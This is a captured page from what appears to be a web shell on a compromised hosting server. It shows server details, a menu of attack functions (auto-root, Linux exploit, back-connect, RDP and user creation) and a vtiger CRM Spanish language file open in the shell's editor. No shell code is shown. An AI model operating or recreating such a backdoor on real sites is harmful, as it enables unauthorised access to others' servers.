Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
crmleta /
languages /
es_es /
[ HOME SHELL ]
Name
Size
Permission
Action
Settings
[ DIR ]
drwxr-xr-x
custom
[ DIR ]
drwx---r-x
Accounts.php
3.26
KB
-rw-r--r--
Assets.php
1.85
KB
-rw-r--r--
Calendar.php
10.35
KB
-rw-r--r--
Campaigns.php
3.33
KB
-rw-r--r--
Contacts.php
3.38
KB
-rw-r--r--
Documents.php
6.18
KB
-rw-r--r--
EmailTemplate.php
1.42
KB
-rw-r--r--
EmailTemplates.php
1.58
KB
-rw-r--r--
Emails.php
2.86
KB
-rw-r--r--
Events.php
3.41
KB
-rw-r--r--
Faq.php
1.64
KB
-rw-r--r--
Google.php
3.83
KB
-rw-r--r--
HelpDesk.php
4.99
KB
-rw-r--r--
Home.php
2.12
KB
-rw-r--r--
Import.php
6.29
KB
-rw-r--r--
Install.php
4
KB
-rw-r--r--
Invoice.php
2.32
KB
-rw-r--r--
Leads.php
3.42
KB
-rw-r--r--
MailManager.php
10.6
KB
-rw-r--r--
Migration.php
1.91
KB
-rw-r--r--
ModComments.php
1.46
KB
-rw-r--r--
PBXManager.php
1.33
KB
-rw-r--r--
PDFMaker.php
31.18
KB
-rw-r--r--
Portal.php
1.76
KB
-rw-r--r--
Potentials.php
3.6
KB
-rw-r--r--
PriceBooks.php
1.39
KB
-rw-r--r--
Products.php
5.16
KB
-rw-r--r--
Project.php
3.87
KB
-rw-r--r--
ProjectMilestone.php
1.68
KB
-rw-r--r--
ProjectTask.php
2.2
KB
-rw-r--r--
Proposal.php
0
B
-rw----r--
PurchaseOrder.php
3.48
KB
-rw-r--r--
Quotes.php
2
KB
-rw-r--r--
RecycleBin.php
1.83
KB
-rw-r--r--
Reports.php
12.85
KB
-rw-r--r--
Rss.php
1.22
KB
-rw-r--r--
SMSNotifier.php
1.59
KB
-rw-r--r--
SalesOrder.php
2.71
KB
-rw-r--r--
ServiceContracts.php
2.58
KB
-rw-r--r--
Services.php
2.03
KB
-rw-r--r--
Users.php
16.17
KB
-rw-r--r--
VTENotepad.php
724
B
-rw-r--r--
Vendors.php
2.46
KB
-rw-r--r--
Vtiger.php
88.07
KB
-rw-r--r--
Webservices.php
907
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Portal.php
<?php /*+*********************************************************************************** * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * ("License"); You may not use this file except in compliance with the License * The Original Code is: vtiger CRM Open Source * The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. *************************************************************************************/ $languageStrings = array( 'Portal' => 'Nuestros Sitios', 'LBL_ADD_BOOKMARK' => 'Añadir marcador', 'LBL_BOOKMARK_NAME' => 'Bookmark Nombre', 'LBL_BOOKMARK_URL' => 'Bookmark Url', 'LBL_CREATED_ON' => 'Creado el', 'SINGLE_Portal' => 'Nuestro Sitio', 'LBL_EDIT_BOOKMARK' => 'Editar marcador', 'LBL_ENTER_BOOKMARK_NAME' => 'Introduzca Nombre de marcador', 'LBL_ENTER_URL' => 'Introduzca Url (www.example.com)', 'LBL_ADD_NEW_BOOKMARK' => 'Crear Nuevo Bookmark', 'LBL_BOOKMARK_SAVED_SUCCESSFULLY' => 'Bookmark guardado correctamente', 'LBL_RECORD_DELETED_SUCCESSFULLY' => 'Registro eliminado con éxito', 'LBL_OUR_SITES_LIST' => 'Nuestra Lista de Sitios', 'LBL_BOOKMARKS_LIST' => 'Lista de enlaces', 'LBL_BOOKMARKS_DELETED_SUCCESSFULLY' => 'Marcadores eliminado correctamente', 'LBL_BOOKMARK' => 'Marcador', 'LBL_BOOKMARKS' => 'Marcadores', 'HTTP_ERROR' => 'La página web que está intentando abrir no es segura y no se puede abrir. Si usted todavía desea ver la página web, entonces usted puede hacer clic en el bloqueador de contenido en la barra de direcciones y habilitarlo.', ); $jsLanguageStrings = array( 'JS_ENTER_MANDATORY_FIELDS' => 'Por favor ingrese todos los campos obligatorios', );
Close